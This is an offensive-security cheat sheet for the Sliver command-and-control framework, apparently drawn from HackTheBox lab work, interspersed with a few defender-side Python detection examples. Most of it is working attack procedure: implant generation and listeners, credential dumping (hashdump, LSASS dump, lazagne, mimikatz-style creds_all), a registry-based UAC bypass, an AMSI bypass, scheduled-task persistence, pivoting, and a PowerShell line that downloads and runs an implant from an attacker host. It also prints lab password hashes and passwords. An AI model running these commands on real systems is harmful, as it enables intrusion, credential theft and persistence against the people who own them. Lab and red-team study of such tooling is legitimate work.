# Sliver

## Sliver Basics

### Installation

```
apt-get update -y 
apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
mkdir sliver 
cd sliver
curl https://sliver.sh/install|sudo bash
```

* Assuming `/usr/local/bin/` is in your `PATH`, the Sliver server should be available in the shell as `sliver-server` and the client as `sliver`.

### Prepare a delivery method <a href="#prepare-a-delivery-method" id="prepare-a-delivery-method"></a>

On your C2 server, run `systemctl start apache2` to start a web server. You can now copy the implants you generate into `/var/www/html` and Apache will serve them. To allow any system user to put a payload there, you can run `chmod -R 777 /var/www/html`.

### Generating the implant <a href="#generating-the-implant" id="generating-the-implant"></a>

Implant generation happens on the C2 server with the `generate` command. Connect to it and run `help generate` to read the extensive help page and learn about all the flags. Here is a selection of the most important flags for now:

* `--mtls 192.168.122.111`: specifies that the implant should connect to the Sliver server over a mutually authenticated TLS connection. Other options are `--wg` for WireGuard, `--http` for HTTP(S) connections or `--dns` for DNS-based C2.
* `--os windows`: specifies that we want to run the implant on Windows (the default, so this one could be omitted). macOS and Linux are also supported.
* `--arch amd64`: specifies that we want a 64-bit implant (also the default, could be omitted). Use `--arch 386` for a 32-bit one.
* `--format exe`: specifies that we want an executable file (again the default). Other options are `--format shared` for dynamic libraries, `--format service` for a Windows service binary (can be used with the `psexec` command) and `--format shellcode` (Windows only).
* `--save /var/www/html/`: specifies the directory to save the binary to. I like to use the Apache web root.

```
sliver > generate --mtls 192.168.122.111 --os windows --arch amd64 --format exe --save /var/www/html
```

### Fix Permissions

The file `/var/www/html/MEDICAL_CHANGE.exe` will not be owned by the Apache system user and has very restrictive file system permissions. To make it accessible for Apache, run `sudo chown www-data:www-data /var/www/html/MEDICAL_CHANGE.exe`.

### Start Listener

Now start the mTLS listener on the C2 server using the `mtls` command. By default, it starts the listener on port 8888. You can view your listeners with the `jobs` command:

```
sliver > mtls

[*] Starting mTLS listener ...
sliver > 
[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port 
==== ====== ========== ======
 1    mtls   tcp        8888
```

### Transfer Binary to Target


### Execute The Binary

* If everything succeeds, you will see a new session open:

```
[*] Session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:36:48 CEST
```

### Using a session <a href="#using-a-session" id="using-a-session"></a>

You can use your session with the `use` command. Just type it, hit enter, and an interactive prompt will appear that lets you select a session. Hit enter again and your prompt changes to the implant name, which was `MEDICAL_CHANGE` in my case. The session is now active and ready to accept your commands. With `info`, you can get more information about the implant:

```
sliver > use

? Select a session or beacon: SESSION  971c5a23  MEDICAL_CHANGE  192.168.122.160:50051  DESKTOP-IPQVF9T  DESKTOP-IPQVF9T\tester  windows/amd64
[*] Active session MEDICAL_CHANGE (971c5a23-73e0-4418-b9c2-266484546e0d)

sliver (MEDICAL_CHANGE) > info

        Session ID: 971c5a23-73e0-4418-b9c2-266484546e0d
              Name: MEDICAL_CHANGE
          Hostname: DESKTOP-IPQVF9T
              UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
          Username: DESKTOP-IPQVF9T\tester
               UID: S-1-5-21-2966923018-1740081829-2498838087-1001
               GID: S-1-5-21-2966923018-1740081829-2498838087-513
               PID: 7244
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: mtls://192.168.122.111:8888
    Remote Address: 192.168.122.160:50051
         Proxy URL: 
Reconnect Interval: 1m0s
```

Sliver implants support many commands; you can get the full list with `help`. Features include file system exploration, file uploads and downloads, port forwarding, taking screenshots and much more.

### Kill Session

```
sessions 
sessions -k session_id
```

```
sliver > sessions

 ID         Transport   Remote Address          Hostname          Username   Operating System   Health  
========== =========== ======================= ================= ========== ================== =========
 971c5a23   mtls        192.168.122.160:50051   DESKTOP-IPQVF9T   tester     windows/amd64      [ALIVE] 

sliver > sessions -k 971c5a23


[!] Lost session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:52:53 CEST
```

### Kill Jobs

* To kill your listener:

```
[server] sliver > jobs

 ID   Name   Protocol   Port 
==== ====== ========== ======
 1    mtls   tcp        8888 

[server] sliver > jobs -k 1

[*] Killing job #1 ...
[*] Successfully killed job #1
[!] Job #1 stopped (tcp/mtls)

```

### Generating Beaconing implant <a href="#generating-the-implant-1" id="generating-the-implant-1"></a>

Generating a beacon implant is very similar to session implant generation. You use the `generate beacon` command. Learn all about the flags with `help generate beacon`. Aside from all the flags discussed above, relevant beacon flags are:

* `--seconds 5`: specifies that the beacon should contact the C2 server every 5 seconds. You could alternatively use `--minutes`, `--hours` or `--days`.
* `--jitter 3`: specifies that an additional random delay of up to 3 seconds should be added to the 5-second interval.

This is how I generated the beacon:

```
sliver > generate beacon --mtls 192.168.122.111 --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/STALE_PNEUMONIA.exe
```
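To show what the `--seconds`/`--jitter` settings above look like on the wire from the defender's side, here is an added Python example (not Sliver's code and not from this page) that simulates check-in times for an interval plus a random extra delay, as the page describes, and applies the inter-arrival regularity check that network beaconing detections commonly use. The uniform jitter distribution and the 0.25 coefficient-of-variation threshold are assumptions.

```python
import random
import statistics


def simulate_checkins(interval, jitter, count, seed=0):
    """Constructed check-in timestamps (seconds from start) for a beacon
    built with `generate beacon --seconds <interval> --jitter <jitter>`:
    every sleep is the interval plus an extra delay of up to `jitter`
    seconds, which this example assumes is drawn uniformly from [0, jitter].
    """
    rng = random.Random(seed)  # fixed seed so runs are reproducible
    now, times = 0.0, []
    for _ in range(count):
        now += interval + rng.uniform(0, jitter)
        times.append(now)
    return times


def interval_stats(times):
    """Mean, population stdev and coefficient of variation (stdev/mean)
    of the gaps between consecutive connections from one host to one peer."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    mean = statistics.mean(gaps)
    stdev = statistics.pstdev(gaps)
    return {"count": len(gaps), "mean": mean, "stdev": stdev,
            "cv": stdev / mean if mean else float("inf")}


def looks_like_beacon(times, min_gaps=10, max_cv=0.25):
    """Regularity test: many connections whose spacing barely varies.
    Human-driven traffic has a CV near or above 1; a jittered beacon stays
    well below it (roughly jitter/sqrt(12) relative to the interval)."""
    if len(times) < min_gaps + 1:
        return False  # too few observations to judge
    return interval_stats(times)["cv"] <= max_cv


if __name__ == "__main__":
    # The page's two configurations: 5s + up to 3s, and 1800s + up to 300s
    for interval, jitter in ((5, 3), (1800, 300)):
        stats = interval_stats(simulate_checkins(interval, jitter, 200))
        print(f"interval={interval}s jitter={jitter}s -> mean gap "
              f"{stats['mean']:.1f}s, CV {stats['cv']:.3f}, "
              f"beacon-like: {stats['cv'] <= 0.25}")
```

The larger interval in the opsec-ready beacon lowers the relative jitter, so it takes far longer to collect enough check-ins but the spacing is, if anything, more regular once you have them.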

### Opsec-ready beacon (long-form and short-form flags)

```
generate beacon --seconds 1800 --jitter 300 --os linux --arch amd64 --format exe --mtls 10.10.10.10:8080 -k 10000 -t 3600 --name main --save /opt/sliver/main
generate beacon -a amd64 -c google.com -f exe -J 300 -k 3000 --mtls 10.10.10.10:8080 --name main -o linux -j 1800 --save /opt/sliver/main -S 1800 -t 3600
```

### Rename Session / Beacon

```
rename --name <newname>
```

### View Beacon Tasks

```
sliver > beacons

 ID         Name         Transport   Hostname       Username   Operating System   Last Check-In   Next Check-In 
========== ============ =========== ============== ========== ================== =============== ===============
 b3b9f2ee   carter_one   mtls        devel          root       linux/amd64        2m15s           57m47s
```

* interact with `use`
* view tasks with `tasks`
* view the output of a task with `task fetch <id>`
* reconfigure an implant's callback frequency with `reconfig -i 1800 -j 5m -t 3600 -r 1800s`

### Sliver Survey

* Execute the following commands in order when a session opens:

```
info               Get info about session
getgid             Get session process GID
getpid             Get session pid
getuid             Get session process UID
whoami             Get session user execution context
ps                 List remote processes
netstat            Print network connection information
pwd                Print working directory
ls                 List current directory
screenshot         Take a screenshot
getprivs           Get current privileges (Windows only)
```

* After this general survey, decide whether (for opsec reasons) you want or need to migrate to a new process.

```
migrate            Migrate into a remote process
getprivs           Get current privileges (Windows only)
```

## Sliver In-Depth

### Implant Generation Quick Paste

```
# linux
generate -a amd64 --format exe --mtls 10.10.14.4:8080 --name DANTENIX01 --os linux --save /home/ubuntu/Documents/htb/dante/10.10.110.100/implants
# windows
generate -a amd64 --format exe --mtls 172.16.1.100:8443 --name DANTE-WS01 --os windows --save /home/ubuntu/Documents/htb/dante/172.16.1.13/implants
```

### Create Listener Quick Paste

```
# mtls listener
mtls -L 10.10.14.2 -l 8080
# pivot listener 
pivots tcp -l 3006 --bind 172.16.1.100 -t 300
```

### Pivots Quick Paste

```
# linux
generate --tcp-pivot 172.16.1.100:3006 -a amd64 -o linux -s /home/ubuntu/Documents/htb/dante/172.16.1.100.3006.pivot
# windows 
generate --tcp-pivot 172.16.1.100:3006 -a amd64 -o windows -s /home/ubuntu/Documents/htb/dante/172.16.1.100.3006.pivot
```

### Download

* Recursive download
* **DANGER**: if you do not set `-t <timeout in seconds>` and the command's default timeout is hit, your session will die.
* If you are downloading a large number of files, set a long timeout to avoid the session being killed.

```
download -r 'C:\Users\katwamba\.ssh'

[*] Wrote 2651 bytes (3 files successfully, 0 files unsuccessfully) to /home/ubuntu/Documents/htb/dante/10.10.110.100/implants/dante-dc01_download_C_Users_katwamba_ssh_1714697939.tar.gz
```

### Port Forward Quick Paste

```
portfwd add -b 60000 -r 127.0.0.1:4444

[*] Port forwarding 127.0.0.1:60000 -> 127.0.0.1:4444
```

* view current port forwards

```
portfwd

 ID   Session ID                             Bind Address      Remote Address  
==== ====================================== ================= =================
  1   15b59b8a-6954-4230-85e3-5ab927fcedc3   127.0.0.1:4444    127.0.0.1:4444  
  2   15b59b8a-6954-4230-85e3-5ab927fcedc3   127.0.0.1:1900    127.0.0.1:1900  
  3   15b59b8a-6954-4230-85e3-5ab927fcedc3   127.0.0.1:50142   127.0.0.1:50142 
```

* delete a current port forward

```
portfwd rm -i 2
```

### Process Enumeration with Command Line

Use `ps -c -f` to see full command lines of running processes. This is critical for finding credentials passed as arguments.

```bash
# Show all processes with full command line
ps -c -f

# Filter for specific process
ps -e "firefox.exe" -c -f
```

**Example credential discovery:**

```bash
ps -c -f
# Output showing credentials in command line:
# 6624   SUPPORTDESK\Chase   C:\Program Files\Mozilla Firefox\firefox.exe : "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
```

### Sliver runas Command

Run a process as a different user (requires valid credentials):

```bash
# Run sliver implant as Administrator
runas -d . -u Administrator -P 'Password123!' -n -p C:\\Windows\\System32\\spool\\drivers\\color\\sliver.exe

# Flags:
# -d  Domain (use "." for local accounts)
# -u  Username
# -P  Password
# -n  NetOnly logon (network credentials only)
# -p  Path to executable
```

**Note:** `runas` may not give you a new session with the elevated user's token. For full impersonation, use `rubeus createnetonly` with `migrate`.

### Rubeus createnetonly + Migrate

For proper credential-based impersonation in Sliver:

```bash
# 1. Create a process with target user's network credentials
rubeus -t 20 -- createnetonly /program:C:\\Windows\\System32\\notepad.exe /domain:. /username:Administrator /password:'Password123!'

# Output:
# [+] Process : 'C:\Windows\System32\notepad.exe' successfully created with LOGON_TYPE = 9
# [+] ProcessID : 5852

# 2. Migrate into the new process
migrate -p 5852

# 3. New session will be created with network access as target user
```
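As an added defender-side example (not from this page or from any of the tools it names), the following Python scans process command lines, such as the `ps -c -f` output above or the CommandLine field of process-creation telemetry, for secrets passed as arguments: password-named URL query parameters like the Firefox line, `/password:` style arguments as in the rubeus command, and `-P`/`--password` flags as in Sliver's `runas`. The sample lines are constructed, and the key and flag patterns are assumptions to tune for your environment.

```python
import re
from urllib.parse import parse_qsl

# Query-string keys that usually carry a secret (assumption: extend as needed)
SECRET_KEY = re.compile(r"pass(word|wd)?|pwd|secret|token", re.I)
# Argument styles seen on this page: `/password:value` (rubeus) and
# `-P value` / `--password value` (Sliver runas). Values may be quoted.
VALUE = r"(?P<val>'[^']*'|\"[^\"]*\"|\S+)"
ARG_PATTERNS = [
    re.compile(r"/(?P<key>password|pass|pwd)[:=]" + VALUE, re.I),
    re.compile(r"(?<!\S)(?P<key>-P|--password)\s+" + VALUE),
]


def find_secrets(cmdline):
    """Return (where, key, value) triples for secrets found in a command line."""
    hits = []
    for token in cmdline.split():
        if "?" in token:  # a URL with a query string, scheme optional
            query = token.split("?", 1)[1]
            for key, value in parse_qsl(query):  # blank values are dropped
                if SECRET_KEY.search(key):
                    hits.append(("url-query", key, value))
    for pattern in ARG_PATTERNS:
        for m in pattern.finditer(cmdline):
            hits.append(("argument", m.group("key"), m.group("val").strip("'\"")))
    return hits


def redact(cmdline):
    """Mask every discovered secret so the line can be stored or shared."""
    for _, _, value in find_secrets(cmdline):
        cmdline = cmdline.replace(value, "***")
    return cmdline


# Constructed samples in the shape of `ps -c -f` output and operator commands
SAMPLES = [
    '6624   SUPPORTDESK\\Chase   C:\\Program Files\\Mozilla Firefox\\firefox.exe : '
    '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" '
    'localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=',
    "runas -d . -u Administrator -P 'Password123!' -n -p C:\\Windows\\System32\\sliver.exe",
    "rubeus -t 20 -- createnetonly /program:C:\\Windows\\System32\\notepad.exe "
    "/domain:. /username:Administrator /password:'Password123!'",
    '1234   NT AUTHORITY\\SYSTEM   C:\\Windows\\System32\\svchost.exe : svchost.exe -k netsvcs -p',
]

if __name__ == "__main__":
    for line in SAMPLES:
        for where, key, value in find_secrets(line):
            print(f"{where}: {key} = {value!r}")
        print(redact(line))
```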

### SharpUp - Automated Priv Esc Checks

GhostPack tool for finding privilege escalation paths.

```bash
sharpup audit

# Example output:
=== SharpUp: Running Privilege Escalation Checks ===
Registry AutoLogon Found

[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Registry AutoLogons ===
        DefaultDomainName: .
        DefaultUserName: Administrator
        DefaultPassword:

=== Unattended Install Files ===
        C:\Windows\Panther\Unattend.xml
```

**What it checks:**

* Modifiable services/binaries
* AlwaysInstallElevated
* Unattended install files
* Registry AutoLogon credentials
* Modifiable scheduled tasks
* Cached GPP passwords

### PowerShell Run Process as Different User

When you have credentials but need to spawn a process as that user from a Sliver shell:

```powershell
# Get into a shell first
shell -t 600

# Create credential object
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(".\Administrator", $pass)

# Download and execute (e.g., new Sliver implant)
(New-Object Net.WebClient).DownloadFile('http://ATTACKER:8000/sliver2.exe', "$env:TEMP\sliver2.exe")
Start-Process -Credential $Cred "$env:TEMP\sliver2.exe"

# New session will appear as the target user
```

### Sliver Windows Post Exploitation

* File searches that often turn up useful finds:

```
execute -t 120 -o cmd.exe /c "dir c:\*pass* /s"
execute -t 120 -o cmd.exe /c "dir c:\*password* /s"
execute -t 120 -o cmd.exe /c "dir c:\*login* /s"
execute -t 120 -o cmd.exe /c "dir c:\*.key /s"
execute -t 120 -o cmd.exe /c "dir c:\*.ica /s"
execute -t 120 -o cmd.exe /c "dir c:\*.pwd* /s"
execute -t 120 -o cmd.exe /c "dir c:\*.config* /s"
execute -t 120 -o cmd.exe /c "dir c:\*access* /s"
```

* passwords in the registry

```
execute -o cmd.exe /c 'reg query HKCU /f password /t REG_SZ /s'
```

### Execute-Assembly

```
execute-assembly -t 80 /home/ubuntu/Downloads/Autoruns64.exe -accepteula
```

### sa-netlocalgroup

* COFF-loader (BOF) method of listing local groups on a Windows machine
* Works on domain controllers as well

```
sa-netlocalgroup
[*] Successfully executed sa-netlocalgroup (coff-loader)
[*] Got output:
Name:      Administrators
Comment:   Administrators have complete and unrestricted access to the computer/domain
--------------------------------
Name:      Users
Comment:   Users are prevented from making accidental or intentional system-wide changes and can run most applications
--------------------------------
Name:      Guests
Comment:   Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
--------------------------------
--snip--
```

### Hashdump

* Dump hashes from sliver session

```
hashdump
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:3317be94bdf8da53235f825815bda05a:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
```

### c2tc-domaininfo

* Enumerate domain information from a DC

```
c2tc-domaininfo
[*] Successfully executed c2tc-domaininfo (coff-loader)
[*] Got output:
--------------------------------------------------------------------
[+] DomainName:
    DANTE.local
[+] DomainGuid:
    {BF59501C-28DB-4087-A02D-E6CFA4C2575D}
[+] DnsForestName:
    DANTE.local
[+] DcSiteName:
    Default-First-Site-Name
[+] ClientSiteName:
    Default-First-Site-Name
[+] DomainControllerName (PDC):
    \\DANTE-DC01.DANTE.local
[+] DomainControllerAddress (PDC):
    \\172.16.1.20
[+] Default Domain Password Policy:
    Password history length: 24
    Maximum password age (d): 180
    Minimum password age (d): 0
    Minimum password length: 7
[+] Account Lockout Policy:
    Account lockout threshold: 0
    Account lockout duration (m): 30
    Account lockout observation window (m): 30
[+] NextDc DnsHostName:
    dante-dc01.dante.local
```

### creds\_all

* Dump all credentials mimikatz-style from a Windows machine; works on a domain controller

```
creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain  NTLM                              SHA1
--------     ------  ----                              ----
DANTE-DC01$  DANTE   b12ff47444ad1cc6996fd2d681a3f136  dec3493ce38fca341cc189fe2513dd797e19ca85
DANTE-DC01$  DANTE   8e387753e4e7e9901053030a0eafa53f  125870c6bbea628954c8e8767761cc1185622fe7
MediaAdmin$  DANTE   7c53bb427b222695060d8fd771743fb9  10757578eb3902bd612c306bee80bf44da1efaab
katwamba     DANTE   14a71f9de5448d83e8c63d46355837c3  61d3cacf6ad5f4571747b302a9658f7e85c5d516
xadmin       DANTE   649f65054a6672a9898cb4eb61f9684a  b57e3049b5960ed60f1baa679ab0cfd4f68b0b06
--snip--
```

### Sharphound Sliver

```
sharp-hound-3 -i -s -t 120
sharp-hound-4 -i -s -t 120
[*] sharp-hound-4 output:

[*] Output saved to /tmp/sharp-hound-4_DANTE-DC01884950909.log

download 20240503015529_BloodHound.zip

[*] Wrote 10141 bytes (1 file successfully, 0 files unsuccessfully) to /home/ubuntu/Documents/htb/dante/10.10.110.100/implants/20240503015529_BloodHound.zip
rm 20240503015529_BloodHound.zip
```

### tcpdump capture with sliver

* Make sure to upload a statically compiled tcpdump that matches the remote target's architecture

```
execute -o tcpdump -n -i any "not host 172.16.1.100" -w /dev/shm/out.pcap -G 600
```

### sharpsh — PowerShell via .NET RunspaceFactory

Execute PowerShell commands through C# RunspaceFactory. Use `-M` for AMSI bypass and `-i` to run in-process:

```
sharpsh -M -i -- "-c whoami"

[*] sharpsh output:
nt authority\system
```

### Shell Management

Detach from an interactive shell with `CTRL+]` (not CTRL+C):

```
PS C:\> ^]
Shell detached
```

List and kill shells:

```
shell ls

 ID   State      Session                                                 PID    PTY
==== ========== ======================================================= ====== =======
  1   detached   HUGE_MILKSHAKE (f44906cb-6562-4aef-a975-844fd782ae19)   5496   false

shell kill 1
[*] Shell 1 killed
```

### Dump LSASS with procdump

Use `procdump` to dump LSASS memory, then parse offline with pypykatz:

```
ps -e lsass.exe

 Pid   Ppid   Executable
===== ====== ============
 664   508    lsass.exe

procdump -n lsass.exe -s /tmp/lsass.dmp -t 120
[*] Process dump stored in: /tmp/lsass.dmp
```

Parse the dump on your attack machine:

```bash
pypykatz lsa minidump /tmp/lsass.dmp
```

### Stored Credentials and runas /savecred

Check for stored credentials on the target:

```
execute -o cmd.exe /c 'cmdkey /list'

Currently stored credentials:

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles
```

If `Domain:interactive` is present, you can run a command as that user without knowing their cleartext password:

```
execute -o cmd.exe /c 'runas /savecred /user:SRV01\mcharles C:\Users\sadams\Desktop\sliver.exe'

[*] Session 2c6931b7 HUGE_MILKSHAKE - 10.129.21.95:49675 (SRV01) - windows/amd64
```

### UAC Bypass via computerdefaults.exe (Non-Interactive)

From a Sliver session running as a user in the Administrators group but at medium integrity:

```
execute -o cmd.exe /c 'reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "C:\Users\sadams\Desktop\sliver.exe" /f && start computerdefaults.exe'
```

A new elevated session will call back.
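A defender's counterpart to this technique, added here as an example rather than taken from the page: the hijack leaves a per-user registry footprint (a `ms-settings\Shell\Open\command` key with an empty `DelegateExecute` value and a default value naming the payload) that Sysmon reports as Event ID 13 registry value-set events. The Python below flags such events from constructed sample records; the field names follow Sysmon's, which logs per-user keys as `HKU\<SID>` and the default value as `(Default)`.

```python
import re

# Sysmon Event ID 13 (RegistryEvent, value set) writes per-user keys as
# HKU\<SID>\... and names the default value "(Default)".
HIJACK_VALUE = re.compile(
    r"^HKU\\(?P<sid>S-1-5-21-[\d-]+)\\Software\\Classes\\ms-settings"
    r"\\Shell\\Open\\command\\(?P<name>DelegateExecute|\(Default\))$", re.I)


def classify(event):
    """Return a finding for a value-set event on the hijack key, else None."""
    if event.get("EventID") != 13:
        return None
    m = HIJACK_VALUE.match(event.get("TargetObject", ""))
    if not m:
        return None
    return {"sid": m.group("sid"), "value": m.group("name").lower(),
            "details": event.get("Details", ""), "writer": event["Image"]}


def find_hijacks(events):
    """Group findings per user SID. Both DelegateExecute and a default value
    naming a program under the same SID is the complete hijack pattern;
    either alone is still worth a look."""
    per_sid = {}
    for ev in events:
        finding = classify(ev)
        if finding:
            per_sid.setdefault(finding["sid"], []).append(finding)
    results = []
    for sid, findings in per_sid.items():
        values = {f["value"] for f in findings}
        command = next((f["details"] for f in findings
                        if f["value"] == "(default)"), "")
        results.append({"sid": sid,
                        "complete": {"delegateexecute", "(default)"} <= values,
                        "command": command,
                        "writers": sorted({f["writer"] for f in findings})})
    return results


# Constructed, Sysmon-shaped sample events (SID and paths are made up)
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-111-222-333-1001\\Software\\Classes"
                     "\\ms-settings\\Shell\\Open\\command\\DelegateExecute",
     "Details": ""},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-111-222-333-1001\\Software\\Classes"
                     "\\ms-settings\\Shell\\Open\\command\\(Default)",
     "Details": "C:\\Users\\sadams\\Desktop\\sliver.exe"},
    {"EventID": 13, "Image": "C:\\Windows\\explorer.exe",  # benign file association
     "TargetObject": "HKU\\S-1-5-21-111-222-333-1001\\Software\\Classes\\.txt\\(Default)",
     "Details": "txtfile"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\computerdefaults.exe"},
]

if __name__ == "__main__":
    for hit in find_hijacks(SAMPLE_EVENTS):
        print(hit)
```

Pairing a complete hit with a subsequent process-creation event for `computerdefaults.exe` under the same user, as in the last sample record, is the natural follow-up correlation.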

### UAC Bypass via msconfig (Interactive / RDP)

From an interactive logon (RDP) as a user in the Administrators group:

1. Launch `C:\Windows\System32\msconfig.exe` — it auto-elevates
2. Go to **Tools** tab
3. Launch **Command Prompt**
4. You are now high-integrity and can run mimikatz/other post-exploitation tools

### Sliver BOFs — Argument Separator

When passing arguments to BOFs in sliver, use `--` to separate sliver flags from BOF arguments:

```
sa-vssenum -t 60 -- -hostname=DC01
```

### Volume Shadow Copies via Sliver

```
execute -o cmd.exe /c "vssadmin CREATE SHADOW /For=C:"

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {4e29f41c-a1ee-4d6f-9f30-9fed439df3be}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

execute -o cmd.exe /c "vssadmin list shadows"
```

### lazagne — Credential Harvesting

Upload and run [lazagne](https://github.com/AlessandroZ/LaZagne) to dump all credentials from the system:

```
upload /opt/bin/lazagne.exe
execute -t 240 -o lazagne.exe all -v
```

Reference: [sliver-cheatsheet lazagne](https://github.com/Anon-Exploiter/sliver-cheatsheet?tab=readme-ov-file#lazagne)

### Port Forwarding with Bind Address

Bind to all interfaces (`0.0.0.0`) to allow other tools to connect through the tunnel:

```
portfwd add -b 0.0.0.0:4445 -r 172.16.1.10:445

[*] Port forwarding 0.0.0.0:4445 -> 172.16.1.10:445
```

**Important:** When using netexec or other multi-threaded tools through sliver tunnels, use `-t 1` to limit threads and avoid killing the tunnel:

```bash
netexec smb 127.0.0.1 -u <user> -d <DOMAIN> -H <hash> --shares --port 4445 -t 1
```

### Scheduled Task Persistence

```
schtasks /create /tn "OneShotTask" /tr "C:\path\to\sliver.exe" /sc ONCE /st 23:59 /rl HIGHEST /f
```

### Upload and Download

```
upload /opt/bin/tool.exe
download C:\Users\target\file.txt
```

### Execute Commands

```
execute -o cmd.exe /c '<command>'
```

### Credential Hunting from Sliver

Search for passwords in files across the file system:

```
execute -o cmd.exe /c 'findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
execute -o cmd.exe /c 'findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
execute -o cmd.exe /c 'findstr /SIM /C:"config" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
```

List files of interest recursively:

```
execute -o cmd.exe /c 'dir /S /B *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml'
```

### Spawn Process as Different User (Multiple Methods)

**Method 1: Sliver `runas` command**

```
runas -d DOMAIN -u USERNAME -P 'PASSWORD' -p 'C:\path\to\sliver.exe' -n
```

**Method 2: PowerShell Start-Process**

```powershell
$username = "jbader"
$password = ConvertTo-SecureString "ILovePower333###" -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($username, $password)
Start-Process "C:\path\to\sliver.exe" -Credential $credential
```
